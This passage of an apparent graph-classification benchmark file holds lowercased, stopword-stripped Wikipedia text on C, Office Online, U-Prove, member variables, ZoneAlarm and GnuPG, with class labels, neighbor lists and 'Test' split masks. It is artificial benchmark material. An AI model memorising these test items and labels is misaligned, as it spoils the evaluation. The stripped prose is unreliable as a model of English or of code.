mathematics express equality indicate assignment following precedent fortran pl/i unlike algol derivatives c uses operator codice_156 test equality similarity two operators assignment equality may result accidental use one place many cases mistake produce error message although compilers produce warnings example conditional expression codice_176 might mistakenly written codice_177 evaluated true codice_76 zero assignment c operator precedence always intuitive example operator codice_156 binds tightly executed prior operators codice_9 bitwise codice_149 bitwise expressions codice_182 must written codice_183 coder intent hello world example appeared first edition k r become model introductory program programming textbooks regardless programming language program prints hello world standard output usually terminal screen display original version main standard-conforming hello world program int main void first line program contains preprocessing directive indicated codice_184 causes compiler replace line entire text codice_185 standard header contains declarations standard input output functions codice_186 codice_187 angle brackets surrounding codice_185 indicate codice_185 located using search strategy prefers headers provided compiler headers name opposed double quotes typically include local project-specific header files next line indicates function named codice_190 defined codice_190 function serves special purpose c programs run-time environment calls codice_190 function begin program execution type specifier codice_30 indicates value returned invoker case run-time environment result evaluating codice_190 function integer keyword codice_15 parameter list indicates function takes arguments opening curly brace indicates beginning definition codice_190 function next line calls diverts execution function named codice_186 case supplied system library call codice_186 function passed provided single argument address first character string literal codice_199 string literal unnamed array elements type codice_57 set automatically compiler final 0-valued character mark end array codice_186 needs know codice_202 escape sequence c translates newline character output signifies end current line return value codice_186 function type codice_30 silently discarded since used careful program might test return value determine whether codice_186 function succeeded semicolon codice_206 terminates statement closing curly brace indicates end code codice_190 function according c99 specification newer codice_190 function unlike function implicitly return value codice_80 upon reaching codice_60 terminates function formerly explicit codice_211 statement required interpreted run-time system exit code indicating successful execution type system c static weakly typed makes similar type system algol descendants pascal built-in types integers various sizes signed unsigned floating-point numbers enumerated types codice_14 integer type codice_57 often used single-byte characters c99 added boolean datatype also derived types including arrays pointers records codice_12 unions codice_35 c often used low-level systems programming escapes type system may necessary compiler attempts ensure type correctness expressions programmer override checks various ways either using type cast explicitly convert value one type another using pointers unions reinterpret underlying bits data object way find c declaration syntax unintuitive particularly function pointers ritchie idea declare identifiers contexts resembling use declaration reflects use c usual arithmetic conversions allow efficient code generated sometimes produce unexpected results example comparison signed unsigned integers equal width requires conversion signed value unsigned generate unexpected results signed value negative c supports use pointers type reference records address location object function memory pointers dereferenced access data stored address pointed invoke pointed-to function pointers manipulated using assignment pointer arithmetic run-time representation pointer value typically raw memory address perhaps augmented offset-within-word field since pointer type includes type thing pointed expressions including pointers type-checked compile time pointer arithmetic automatically scaled size pointed-to data type pointers used many purposes c. text strings commonly manipulated using pointers arrays characters dynamic memory allocation performed using pointers many data types trees commonly implemented dynamically allocated codice_12 objects linked together using pointers pointers functions useful passing functions arguments higher-order functions qsort bsearch callbacks invoked event handlers null pointer value explicitly points valid location dereferencing null pointer value undefined often resulting segmentation fault null pointer values useful indicating special cases next pointer final node linked list error indication functions returning pointers appropriate contexts source code assigning pointer variable null pointer constant written codice_80 without explicit casting pointer type codice_218 macro defined several standard headers conditional contexts null pointer values evaluate false pointer values evaluate true void pointers codice_219 point objects unspecified type therefore used generic data pointers since size type pointed-to object known void pointers dereferenced pointer arithmetic allowed although easily many contexts implicitly converted object pointer type careless use pointers potentially dangerous typically unchecked pointer variable made point arbitrary location cause undesirable effects although properly used pointers point safe places made point unsafe places using invalid pointer arithmetic objects point may continue used deallocation dangling pointers may used without initialized wild pointers may directly assigned unsafe value using cast union another corrupt pointer general c permissive allowing manipulation conversion pointer types although compilers typically provide options various levels checking programming languages address problems using restrictive reference types array types c traditionally fixed static size specified compile time recent c99 standard also allows form variable-length arrays however also possible allocate block memory arbitrary size run-time using standard library codice_220 function treat array c unification arrays pointers means declared arrays dynamically allocated simulated arrays virtually interchangeable since arrays always accessed effect via pointers array accesses typically checked underlying array size although compilers may provide bounds checking option array bounds violations therefore possible rather common carelessly written code lead various repercussions including illegal memory accesses corruption data buffer overruns run-time exceptions bounds checking desired must done manually c special provision declaring multi-dimensional arrays rather relies recursion within type system declare arrays arrays effectively accomplishes thing index values resulting multi-dimensional array thought increasing row-major order multi-dimensional arrays commonly used numerical algorithms mainly applied linear algebra store matrices structure c array well suited particular task however since arrays passed merely pointers bounds array must known fixed values else explicitly passed subroutine requires dynamically sized arrays arrays accessed using double indexing workaround allocate array additional row vector pointers columns c99 introduced variable-length arrays address issues ordinary c arrays subscript notation codice_221 codice_222 designates pointer syntactic sugar codice_223 taking advantage compiler knowledge pointer type address codice_224 points base address pointed codice_222 incremented codice_27 bytes rather defined base address incremented codice_27 multiplied size element codice_222 points thus codice_221 designates codice_230th element array furthermore expression contexts notable exception operand codice_108 name array automatically converted pointer array first element implies array never copied whole named argument function rather address first element passed therefore although function calls c use pass-by-value semantics arrays effect passed reference size element determined applying operator codice_108 dereferenced element codice_222 codice_234 codice_235 number elements declared array codice_78 determined codice_237 latter applies array names variables declared subscripts codice_238 due semantics c possible determine entire size arrays pointers arrays created dynamic allocation codice_220 code codice_240 codice_241 designates pointer work since compiler assumes size pointer requested since array name arguments codice_108 converted pointers exhibit ambiguity however arrays created dynamic allocation accessed pointers rather true array variables suffer codice_108 issues array pointers thus despite apparent equivalence array pointer variables still distinction made even though name array expression contexts converted pointer first element pointer occupy storage array name l-value address constant unlike pointer variable consequently array points changed impossible assign new address array name array contents may copied however using codice_244 function accessing individual elements one important functions programming language provide facilities managing memory objects stored memory c provides three distinct ways allocate memory objects three approaches appropriate different situations various trade-offs example static memory allocation little allocation overhead automatic allocation may involve slightly overhead dynamic memory allocation potentially great deal overhead allocation deallocation persistent nature static objects useful maintaining state information across function calls automatic allocation easy use stack space typically much limited transient either static memory heap space dynamic memory allocation allows convenient allocation objects whose size known run-time c programs make extensive use three possible automatic static allocation usually simplest storage managed compiler freeing programmer potentially error-prone chore manually allocating releasing storage however many data structures change size runtime since static allocations automatic allocations c99 must fixed size compile-time many situations dynamic allocation necessary prior c99 standard variable-sized arrays common example see article codice_220 example dynamically allocated arrays unlike automatic allocation fail run time uncontrolled consequences dynamic allocation functions return indication form null pointer value required storage allocated static allocation large usually detected linker loader program even begin execution unless otherwise specified static objects contain zero null pointer values upon program startup automatically dynamically allocated objects initialized initial value explicitly specified otherwise initially indeterminate values typically whatever bit pattern happens present storage might even represent valid value type program attempts access uninitialized value results undefined many modern compilers try detect warn problem false positives false negatives occur another issue heap memory allocation synchronized actual usage program order reused much possible example pointer heap memory allocation goes scope value overwritten codice_249 called memory recovered later reuse essentially lost program phenomenon known memory leak conversely possible memory freed continue referenced leading unpredictable results typically symptoms appear portion program far removed actual error making difficult track problem issues ameliorated languages automatic garbage collection c programming language uses libraries primary method extension c library set functions contained within single archive file library typically header file contains prototypes functions contained within library may used program declarations special data types macro symbols used functions order program use library must include library header file library must linked program many cases requires compiler flags e.g. codice_250 shorthand link math library common c library c standard library specified iso ansi c standards comes every c implementation implementations target limited environments embedded systems may provide subset standard library library supports stream input output memory allocation mathematics character strings time values several separate standard headers example codice_185 specify interfaces standard library facilities another common set c library functions used applications specifically targeted unix unix-like systems especially functions provide interface kernel functions detailed various standards posix single unix specification since many programs written c wide variety libraries available libraries often written c c compilers generate efficient object code programmers create interfaces library routines used higher-level languages like java perl python file input output i/o part c language instead handled libraries c standard library associated header files e.g codice_185 file handling generally implemented high-level i/o works streams stream perspective data flow independent devices file concrete device high level i/o done association stream file c standard library buffer memory area queue temporarily used store data sent final destination reduces time spent waiting slower devices example hard drive solid state drive low-level i/o functions part standard c library generally part bare metal programming programming independent operating system embedded programming exceptions implementations include low-level i/o number tools developed help c programmers find fix statements undefined behavior possibly erroneous expressions greater rigor provided compiler tool lint first leading many others automated source code checking auditing beneficial language c many tools exist lint common practice use lint detect questionable code program first written program passes lint compiled using c compiler also many compilers optionally warn syntactically valid constructs likely actually errors misra c proprietary set guidelines avoid questionable code developed embedded systems also compilers libraries operating system level mechanisms performing actions standard part c bounds checking arrays detection buffer overflow serialization dynamic memory tracking automatic garbage collection tools purify valgrind linking libraries containing special versions memory allocation functions help uncover runtime errors memory usage c widely used systems programming implementing operating systems embedded system applications c code written portability used purposes yet needed system-specific code used access specific hardware addresses perform type punning match externally imposed interface requirements low run-time demand system resources c also used website programming using cgi gateway information web application server browser c often chosen interpreted languages speed stability near-universal availability one consequence c wide availability efficiency compilers libraries interpreters programming languages often implemented c. reference implementations python perl php example written c. layer abstraction thin overhead low c enables programmers create efficient implementations algorithms data structures useful computationally intense programs example gnu multiple precision arithmetic library gnu scientific library mathematica matlab completely partially written c. c sometimes used intermediate language implementations languages approach may used portability convenience using c intermediate language additional machine-specific code generators necessary c features line-number preprocessor directives optional superfluous commas end initializer lists support compilation generated code however c shortcomings prompted development c-based languages specifically designed use intermediate languages c -- c also widely used implement end-user applications however applications also written newer higher-level languages c directly indirectly influenced many later languages c go java javascript limbo lpc perl php python unix c shell pervasive influence syntactical languages mentioned combine statement less recognizably expression syntax c type systems data models and/or large-scale program structures differ c sometimes radically several c near-c interpreters exist including ch cint also used scripting object-oriented languages became popular c++ objective-c two different extensions c provided object-oriented capabilities languages originally implemented source-to-source compilers source code translated c compiled c compiler c++ programming language devised bjarne stroustrup approach providing object-oriented functionality c-like syntax c++ adds greater typing strength scoping tools useful object-oriented programming permits generic programming via templates nearly superset c c++ supports c exceptions objective-c originally thin layer top c remains strict superset c permits object-oriented programming using hybrid dynamic/static typing paradigm objective-c derives syntax c smalltalk syntax involves preprocessing expressions function declarations function calls inherited c syntax object-oriented features originally taken smalltalk addition c++ objective-c ch cilk unified parallel c nearly supersets c",
    "neighbors": [
      2050,
      6148,
      4104,
      9,
      6154,
      2062,
      15,
      6160,
      2066,
      10258,
      8221,
      6176,
      6177,
      10272,
      10273,
      6180,
      10280,
      10284,
      2098,
      10292,
      2103,
      4152,
      2105,
      6201,
      10296,
      2109,
      4161,
      8258,
      10306,
      6212,
      69,
      2117,
      8262,
      2120,
      10314,
      4171,
      4173,
      10317,
      83,
      2132,
      6227,
      4182,
      6228,
      8280,
      6236,
      8285,
      10333,
      8289,
      6242,
      6244,
      10340,
      2152,
      6248,
      8297,
      107,
      10345,
      4205,
      8301,
      8303,
      8304,
      113,
      10352,
      2164,
      10359,
      2168,
      8312,
      10370,
      2179,
      132,
      2180,
      6278,
      136,
      2186,
      10382,
      143,
      2191,
      10387,
      6293,
      6295,
      6296,
      10393,
      155,
      10395,
      2206,
      4255,
      6304,
      2216,
      4267,
      4268,
      10413,
      2225,
      8369,
      2228,
      2233,
      187,
      2236,
      6333,
      190,
      6335,
      8385,
      2242,
      6338,
      196,
      2245,
      4294,
      10435,
      4296,
      6345,
      10438,
      10443,
      2253,
      6349,
      2255,
      4307,
      213,
      2262,
      6363,
      6365,
      8413,
      8414,
      6369,
      226,
      228,
      6373,
      8421,
      6375,
      8424,
      10469,
      6378,
      8426,
      10470,
      4333,
      8429,
      2287,
      240,
      10474,
      242,
      8435,
      2292,
      4341,
      8438,
      8439,
      10480,
      10488,
      8445,
      2303,
      2304,
      8448,
      6402,
      4358,
      263,
      8454,
      10506,
      2317,
      270,
      6413,
      10510,
      280,
      8473,
      10520,
      6427,
      10525,
      2335,
      288,
      6433,
      2338,
      292,
      6437,
      8486,
      295,
      8487,
      10537,
      300,
      4398,
      303,
      6446,
      305,
      6450,
      8502,
      2361,
      4410,
      10555,
      6460,
      8509,
      2368,
      321,
      8513,
      8514,
      8516,
      10561,
      10565,
      8520,
      10569,
      8522,
      10570,
      332,
      8524,
      335,
      4433,
      8531,
      10581,
      10584,
      2394,
      8539,
      10586,
      349,
      8545,
      356,
      2404,
      4454,
      6501,
      6502,
      8549,
      8554,
      4459,
      2415,
      6523,
      380,
      8573,
      4479,
      6528,
      386,
      4485,
      8582,
      10631,
      8587,
      10638,
      2447,
      2448,
      2450,
      8597,
      406,
      10645,
      4506,
      6555,
      8602,
      10651,
      414,
      10654,
      10658,
      8611,
      8614,
      4519,
      6568,
      4521,
      8618,
      428,
      2476,
      6574,
      8621,
      8624,
      2481,
      8626,
      8627,
      10670,
      2485,
      10675,
      8631,
      10680,
      443,
      10683,
      10684,
      2494,
      4544,
      8641,
      8644,
      4550,
      2505,
      4553,
      462,
      10703,
      2513,
      4561,
      470,
      2519,
      4572,
      477,
      10720,
      2529,
      6625,
      4580,
      8677,
      6631,
      8680,
      8683,
      492,
      10732,
      4590,
      4592,
      6640,
      10739,
      502,
      4601,
      508,
      4604,
      8702,
      4607,
      512,
      6657,
      10752,
      515,
      516,
      4611,
      4614,
      10753,
      4616,
      6664,
      10760,
      10761,
      8719,
      4630,
      8728,
      2585,
      10776,
      8738,
      547,
      10786,
      6694,
      2599,
      10791,
      2603,
      2605,
      10800,
      6705,
      4661,
      4663,
      2617,
      8762,
      2620,
      4669,
      6718,
      10814,
      577,
      8771,
      8773,
      8775,
      4680,
      10824,
      587,
      4684,
      4685,
      6731,
      10831,
      596,
      6742,
      10841,
      2652,
      2656,
      2658,
      6754,
      10851,
      10852,
      10854,
      10857,
      2670,
      623,
      6772,
      4729,
      6780,
      2685,
      4734,
      639,
      640,
      8830,
      10883,
      2693,
      10889,
      2698,
      4746,
      8844,
      6797,
      655,
      6800,
      6802,
      8854,
      6810,
      4763,
      6813,
      10910,
      671,
      673,
      6821,
      8870,
      2727,
      10917,
      4777,
      682,
      2730,
      8874,
      4781,
      8877,
      687,
      2739,
      692,
      2741,
      4789,
      6838,
      4801,
      708,
      10950,
      712,
      2761,
      8904,
      8907,
      10953,
      6864,
      10964,
      2774,
      4822,
      4823,
      10967,
      10971,
      8924,
      736,
      10977,
      4840,
      8940,
      2798,
      10991,
      753,
      2804,
      2809,
      8954,
      11003,
      6910,
      769,
      4865,
      11009,
      8965,
      8966,
      6920,
      2825,
      6922,
      779,
      2828,
      8973,
      11017,
      11023,
      8976,
      2836,
      4885,
      6933,
      6934,
      11030,
      11036,
      797,
      798,
      8991,
      2849,
      8994,
      8995,
      2852,
      4902,
      9001,
      2862,
      815,
      9008,
      817,
      6962,
      9010,
      11056,
      823,
      4919,
      2875,
      9019,
      2878,
      11071,
      6977,
      11079,
      842,
      9034,
      11082,
      11084,
      11086,
      847,
      4949,
      2903,
      2904,
      11095,
      11098,
      2908,
      865,
      4961,
      2916,
      4968,
      9064,
      11112,
      875,
      7019,
      2925,
      4974,
      7020,
      7022,
      7027,
      11125,
      2936,
      898,
      900,
      4998,
      9097,
      2955,
      909,
      7053,
      9103,
      5008,
      2966,
      11161,
      2970,
      5023,
      7071,
      2978,
      7076,
      9125,
      934,
      935,
      9128,
      937,
      11179,
      5036,
      9133,
      7087,
      944,
      5040,
      9138,
      2995,
      5045,
      9141,
      9142,
      952,
      9151,
      9152,
      961,
      11202,
      963,
      5059,
      11203,
      966,
      11207,
      11212,
      9166,
      5074,
      11218,
      11219,
      3030,
      5078,
      3033,
      3034,
      11227,
      5084,
      7139,
      7140,
      3048,
      3049,
      5096,
      7144,
      5100,
      7147,
      3055,
      7152,
      1010,
      11252,
      9205,
      7158,
      1016,
      11257,
      11267,
      3076,
      11269,
      9223,
      9231,
      11279,
      7192,
      5148,
      5149,
      3102,
      9244,
      9245,
      11294,
      11303,
      9256,
      1067,
      5165,
      1075,
      3126,
      1079,
      7223,
      9272,
      11322,
      3134,
      9281,
      7237,
      3144,
      9290,
      1100,
      5196,
      9298,
      3159,
      7256,
      3164,
      11363,
      5220,
      7269,
      1126,
      5222,
      9318,
      7273,
      1130,
      7274,
      5228,
      5230,
      1138,
      9330,
      3188,
      5236,
      7285,
      9331,
      11383,
      11384,
      7292,
      11391,
      1152,
      5249,
      5250,
      7296,
      1156,
      3204,
      3206,
      7301,
      9345,
      11403,
      7309,
      5262,
      3216,
      9360,
      1178,
      11418,
      3229,
      7326,
      7329,
      11428,
      3237,
      7338,
      9387,
      7341,
      9389,
      3248,
      7346,
      1203,
      7347,
      11446,
      1207,
      1211,
      7355,
      1215,
      7361,
      5316,
      1221,
      1232,
      9425,
      1236,
      5334,
      9431,
      5336,
      9432,
      9437,
      3296,
      7392,
      5346,
      11490,
      1253,
      7398,
      1255,
      5354,
      5355,
      11501,
      9454,
      11503,
      11506,
      5363,
      9460,
      5365,
      3321,
      1277,
      7421,
      7423,
      3328,
      7428,
      5381,
      3334,
      5383,
      9479,
      11528,
      9487,
      5395,
      7443,
      5397,
      3350,
      5399,
      1304,
      1305,
      7445,
      5403,
      9491,
      9497,
      3358,
      5406,
      11552,
      7457,
      3362,
      11555,
      5413,
      11566,
      7471,
      9519,
      1335,
      5431,
      7479,
      7481,
      7486,
      1343,
      5440,
      1347,
      1348,
      1349,
      3399,
      7497,
      1358,
      5455,
      1360,
      1361,
      3409,
      5456,
      7506,
      3413,
      9557,
      11599,
      11601,
      7513,
      5467,
      9564,
      1375,
      5471,
      11618,
      5477,
      3430,
      11625,
      5482,
      3435,
      9579,
      7535,
      3443,
      5492,
      7540,
      9587,
      3447,
      1401,
      3449,
      7548,
      7550,
      5506,
      9604,
      3461,
      3462,
      3465,
      7562,
      9610,
      11661,
      1422,
      9616,
      5521,
      5522,
      1427,
      7571,
      9623,
      9626,
      1435,
      7580,
      9628,
      3486,
      9631,
      3488,
      11674,
      11682,
      11688,
      7593,
      5546,
      3499,
      7595,
      9642,
      1454,
      9643,
      11689,
      5557,
      7608,
      1465,
      7611,
      7612,
      1469,
      5567,
      5569,
      1474,
      9671,
      1480,
      3529,
      7626,
      7627,
      7629,
      1491,
      5588,
      9687,
      7646,
      3553,
      5603,
      1510,
      1515,
      1516,
      3565,
      5612,
      5613,
      10478,
      7666,
      9714,
      5620,
      7671,
      3577,
      1530,
      7675,
      3581,
      3582,
      5630,
      5634,
      5635,
      7684,
      5637,
      5638,
      9730,
      9735,
      7689,
      3594,
      7694,
      3600,
      3601,
      7696,
      5651,
      1556,
      7700,
      9751,
      9752,
      1561,
      3613,
      5663,
      9759,
      3618,
      1572,
      5670,
      1578,
      1580,
      5677,
      5679,
      5680,
      9776,
      1586,
      5684,
      7734,
      1591,
      9783,
      9784,
      1594,
      3642,
      9787,
      5694,
      5695,
      5697,
      9794,
      7749,
      5702,
      5703,
      9798,
      1610,
      1611,
      3659,
      1613,
      5708,
      5710,
      3664,
      3665,
      5711,
      5714,
      7769,
      3675,
      5723,
      7772,
      7774,
      9820,
      1632,
      5729,
      9828,
      1637,
      5734,
      9831,
      5737,
      3691,
      9836,
      7789,
      1646,
      5743,
      5747,
      9843,
      9848,
      3705,
      5754,
      3708,
      7805,
      5759,
      1664,
      1666,
      9859,
      1668,
      5765,
      1670,
      7813,
      1672,
      1673,
      5768,
      9865,
      1676,
      3727,
      9871,
      9875,
      3733,
      3734,
      5783,
      1689,
      5785,
      7834,
      7835,
      5790,
      3744,
      5796,
      9893,
      1702,
      3750,
      5803,
      7857,
      9908,
      3766,
      3767,
      5816,
      7867,
      1724,
      9915,
      5824,
      3777,
      1730,
      9925,
      5830,
      9926,
      1736,
      5833,
      9932,
      7885,
      3790,
      3793,
      1746,
      7889,
      9939,
      9944,
      9946,
      9949,
      5861,
      9964,
      7919,
      5881,
      7930,
      1790,
      3843,
      5892,
      7940,
      7943,
      5896,
      1801,
      9997,
      7950,
      10000,
      1810,
      3859,
      1812,
      5911,
      10008,
      3865,
      10009,
      3867,
      10011,
      10012,
      1822,
      3871,
      5920,
      5921,
      1826,
      7967,
      3876,
      10025,
      10026,
      1839,
      7983,
      1841,
      1842,
      1843,
      10033,
      1851,
      1852,
      3900,
      10043,
      10045,
      3904,
      1859,
      1860,
      3907,
      3909,
      3911,
      1865,
      3914,
      10065,
      5970,
      8019,
      10068,
      5978,
      3931,
      3939,
      3940,
      8037,
      10083,
      8039,
      8041,
      10089,
      8043,
      10098,
      3960,
      8057,
      1916,
      1917,
      6016,
      1923,
      3975,
      1932,
      1933,
      8079,
      1937,
      8082,
      10129,
      3990,
      1943,
      6044,
      1951,
      1952,
      4001,
      1954,
      6049,
      10143,
      10145,
      4006,
      10148,
      1960,
      6056,
      6057,
      10151,
      1965,
      1971,
      1972,
      4020,
      4024,
      8120,
      6074,
      6075,
      8125,
      1987,
      6086,
      6087,
      8136,
      1993,
      4042,
      10187,
      8140,
      8141,
      8144,
      2001,
      6100,
      4053,
      6102,
      4057,
      4058,
      4064,
      6112,
      2018,
      4069,
      8169,
      6122,
      8171,
      2028,
      10222,
      2035,
      6132,
      4085,
      6135,
      4089,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 2046,
    "label": 7,
    "text": "Office_Online:office online office online known 2014 office web apps july 2019 office online office suite offered microsoft allows users create edit files using lightweight microsoft office web apps word excel powerpoint onenote offering also includes outlook.com people calendar onedrive accessible unified app switcher users install on-premises version service called office online server private clouds conjunction sharepoint microsoft exchange server microsoft lync server office web apps first revealed october 2008 pdc 2008 los angeles chris capossela senior vice president microsoft business division introduced office web apps lightweight versions word excel powerpoint onenote allow people create edit collaborate office documents web browser according capossela office web apps become available part office live workspace office web apps announced powered ajax well silverlight however latter optional availability enhance user experience resulting sharper images improved rendering microsoft business division president stephen elop stated pdc 2008 technology preview office web apps would become available later 2008 however technical preview office web apps released 2009 july 13 2009 microsoft announced worldwide partners conference 2009 new orleans microsoft office 2010 reached technical preview development milestone features office web apps demonstrated public first time additionally microsoft announced office web apps would made available consumers online free charge microsoft software assurance customers option running premises office 2010 beta testers given access office web apps date announced would available testers august 2009 however august 2009 microsoft spokesperson stated delay release office web apps technical preview would available end august microsoft officially released technical preview office web apps september 17 2009 office web apps made available selected testers via onedrive time skydrive service final version office web apps made available public via windows live office june 7 2010 october 22 2012 microsoft announced release new features including co-authoring performance improvements touch support november 6 2013 microsoft announced new features including real-time co-authoring auto-save feature word replacing save button february 2014 office web apps re-branded office online incorporated microsoft web services including calendar onedrive outlook.com people microsoft previously attempted unify online services suite including microsoft passport hotmail msn messenger later skydrive brand known windows live first launched 2005 however impending launch windows 8 increased use cloud services microsoft dropped windows live brand emphasize services would built directly windows merely bolted add-on critics criticized windows live brand clear vision applied increasingly broad array unrelated services time windows live hotmail re-launched outlook.com sharing name microsoft outlook personal information manager july 2019 microsoft announced retiring online branding office online product office may referred office web office browser office online open edit documents spreadsheets presentations office open xml formats web starting july 2013 render pdf documents convert microsoft word documents although formatting document may deviate original since november 2013 apps supported real-time co-authoring autosave word files word online lacks two ribbons exist word 2013 references mailings mailing allows users print envelopes labels manage mail merge printing word documents references contains features needed advanced documents e.g table contents citations bibliography captions index table authorities word online change insert section breaks views available word desktop app outline draft web layout full screen reading available word online likewise side-by-side viewing split windows available word online excel online execute macros revision support color cells outside default palette supported web browsers include microsoft edge internet explorer 11 latest versions firefox google chrome well safari os x 10.8 later personal edition office online available general public free charge microsoft account office.com website superseded skydrive onedrive office live workspace enterprise-managed versions available office 365 february 2013 ability view edit files skydrive without signing added service also installed privately enterprise environments sharepoint app office web apps server microsoft also offers web apps office suite outlook web app formerly outlook web access lync web app formerly office communicator web access project web app formerly project web access additionally microsoft offers service name online doc viewer view office documents website via office online google chrome extension free available use office online directly",
    "neighbors": [
      9347,
      11144,
      2443,
      1817,
      8740,
      10029,
      440,
      5057,
      2632,
      460,
      5078,
      2777,
      4704,
      7523,
      4326,
      3690,
      3691,
      10986,
      877,
      11372,
      1904,
      9328,
      5619,
      254
    ],
    "mask": "None"
  },
  {
    "node_id": 2047,
    "label": 2,
    "text": "U-Prove:u-prove u-prove microsoft technology user-centric identity management underlying cryptographic protocols designed dr. stefan brands developed credentica subsequently microsoft u-prove enables application developers reconcile seemingly conflicting security privacy objectives including anonymity allows digital identity claims efficiently tied use tamper-resistant devices smart cards application areas particular interest include cross-domain enterprise identity access management e-government sso data sharing electronic health records anonymous electronic voting policy-based digital rights management social networking data portability electronic payments 2008 microsoft committed opening u-prove technology first step march 2010 company released cryptographic specification open-source api implementation code part u-prove technology community technology preview microsoft open specification promise since several extensions released terms technology tested real-life applications",
    "neighbors": [
      3521,
      8227,
      9320,
      9745,
      1368,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2048,
    "label": 9,
    "text": "Member_variable:member variable object-oriented programming member variable sometimes called member field variable associated specific object accessible methods member functions class-based languages distinguished two types one copy variable shared instances class called class variable static member variable instance class copy variable variable called instance variable class foo int main public class program public class foo class foo f foo f.bar 100 print f.bar",
    "neighbors": [
      1152,
      5059,
      8644,
      11589,
      8041,
      2029,
      1973,
      7894,
      10684,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 2049,
    "label": 4,
    "text": "ZoneAlarm:zonealarm zonealarm internet security software company provides consumer antivirus firewall products zonealarm developed zone labs acquired march 2004 check point zonealarm firewall security products include inbound intrusion detection system well ability control programs create outbound connections august 2015 zonealarm introduced 100 virus-free guarantee extreme security product zonealarm program access controlled way zones network connections divided trusted zone generally includes user local area network share resources files printers internet zone includes everything trusted zone user specify permissions trusted zone client trusted zone server internet zone client internet zone server give program attempts access internet e.g running first time alternatively zonealarm ask user give program permission first access attempt true vector internet monitor also known truevector security engine windows service core zonealarm processes list image name vsmon.exe monitors internet traffic generates alerts disallowed access operating system firewall osfirewall monitors programs generates alerts perform suspicious behaviors osfirewall useful preventing rootkits spyware smartdefense advisor name zonealarm give service available versions helps user certain types alert using database trusted program signatures provide user advice allowing denying internet access response program requests current free version zonealarm ad paid version pops every single time turn computer short delay free pro editions zonealarm firewall designated pcmag editor ’ choice 2017 january 2006 zonealarm reportedly sending data company servers covert fashion developer dismissed allegations zonealarm spying clients saying issue related software updates would fixed december 2007 browser toolbar shipped zonealarm opt-out well received removed later versions software september 2 2010 free version zonealarm started showing global virus alert popup scareware tactic get users switch paid security suite popup turned zonealarm marketing team uproar disgruntled users many uninstalled software",
    "neighbors": [
      2563,
      1052,
      550,
      10790,
      2601,
      6699,
      8753,
      569,
      5178,
      3643,
      9279,
      9791,
      10308,
      2118,
      2654,
      8816,
      4722,
      10872,
      5245,
      9341,
      127,
      7809,
      131,
      6797,
      1172,
      10392,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      6834,
      704,
      10433,
      7362,
      202,
      7370,
      4814,
      7886,
      9423,
      10451,
      1242,
      6364,
      5860,
      10987,
      6382,
      8943,
      9971,
      3320,
      1273,
      9983,
      1792,
      5891,
      4374,
      9496,
      6431,
      10531,
      5924,
      1318,
      8998,
      2859,
      3885,
      7983,
      4403,
      9523,
      3381,
      823,
      11577,
      9537,
      1858,
      11073,
      4421,
      1355,
      10574,
      4435,
      8024,
      4953,
      9048,
      2907,
      9055,
      6496,
      9569,
      3941,
      3942,
      11622,
      4464,
      3955,
      4480,
      1417,
      3981,
      10637,
      3482,
      1436,
      4511,
      8614,
      8615,
      10166,
      7103,
      5057,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "None"
  },
  {
    "node_id": 2050,
    "label": 4,
    "text": "GNU_Privacy_Guard:gnu privacy guard gnu privacy guard gnupg gpg free-software replacement symantec pgp cryptographic software suite compliant rfc 4880 ietf standards-track specification openpgp modern versions pgp interoperable gnupg openpgp-compliant systems gnupg part gnu project received major funding german government gnupg hybrid-encryption software program uses combination conventional symmetric-key cryptography speed public-key cryptography ease secure key exchange typically using recipient public key encrypt session key used mode operation part openpgp standard part pgp first version gnupg 1.x series uses integrated cryptographic library gnupg 2.x series replaces libgcrypt gnupg encrypts messages using asymmetric key pairs individually generated gnupg users resulting public keys may exchanged users variety ways internet key servers must always exchanged carefully prevent identity spoofing corrupting public key ↔ owner identity correspondences also possible add cryptographic digital signature message message integrity sender verified particular correspondence relied upon corrupted gnupg also supports symmetric encryption algorithms default gnupg uses aes symmetrical algorithm since version 2.1 cast5 used earlier versions gnupg use patented otherwise restricted software algorithms instead gnupg uses variety non-patented algorithms long time support idea encryption algorithm used pgp fact possible use idea gnupg downloading plugin however might require license uses countries idea patented starting versions 1.4.13 2.0.20 gnupg supports idea last patent idea expired 2012 support idea intended get rid questions folks either trying decrypt old data migrating keys pgp gnupg hence recommended regular use versions 2.0.26 1.4.18 gnupg supports following algorithms recent releases gnupg 2.x modern deprecated stable series expose cryptographic functions algorithms libgcrypt cryptography library provides including support elliptic curve cryptography ecdsa ecdh eddsa modern series i.e since gnupg 2.1 gnupg initially developed werner koch first production version version 1.0.0 released september 7 1999 almost two years first gnupg release version 0.0.0 german federal ministry economics technology funded documentation port microsoft windows 2000 gnupg system compliant openpgp standard thus history openpgp importance designed interoperate pgp email encryption program initially designed developed phil zimmermann february 7 2014 gnupg crowdfunding effort closed raising €36,732 new web site infrastructure improvements two actively maintained branches gnupg different gnupg 2.x versions e.g 2.2 2.0 branches installed time however possible install classic gnupg version i.e 1.4 branch along gnupg 2.x version release gnupg 2.2 modern deprecated stable branch 2.0 recommended general use initially released november 13 2006 branch reached end-of-life december 31 2017 last version 2.0.31 released december 29 2017 release gnupg 2.0 stable releases originated single branch i.e. november 13 2006 multiple release branches maintained parallel former sequentially succeeding 1.4 release branches although basic gnupg program command-line interface exists various front-ends provide graphical user interface example gnupg encryption support integrated kmail evolution graphical email clients found kde gnome popular linux desktops also graphical gnupg front-ends example seahorse gnome kgpg kde gpg suite project provides number aqua front-ends os integration encryption key management well gnupg installations via installer packages macos furthermore gpg suite installer installs related openpgp applications gpg keychain access plugins gpgmail dependencies macgpg use gnupg based encryption instant messaging applications psi fire automatically secure messages gnupg installed configured web-based software horde also makes use cross-platform extension enigmail provides gnupg support mozilla thunderbird seamonkey similarly enigform provides gnupg support mozilla firefox firegpg discontinued june 7 2010 2005 g10 code gmbh intevation gmbh released gpg4win software suite includes gnupg windows gnu privacy assistant gnupg plug-ins windows explorer outlook tools wrapped standard windows installer making easier gnupg installed used windows systems command-line-based system gnupg 1.x written api may incorporated software overcome gpgme abbreviated gnupg made easy created api wrapper around gnupg parses output gnupg provides stable maintainable api components currently requires out-of-process call gnupg executable many gpgme api calls result possible security problems application propagate actual crypto code due process barrier various graphical front-ends based gpgme created since gnupg 2.0 many gnupg functions available directly c apis libgcrypt 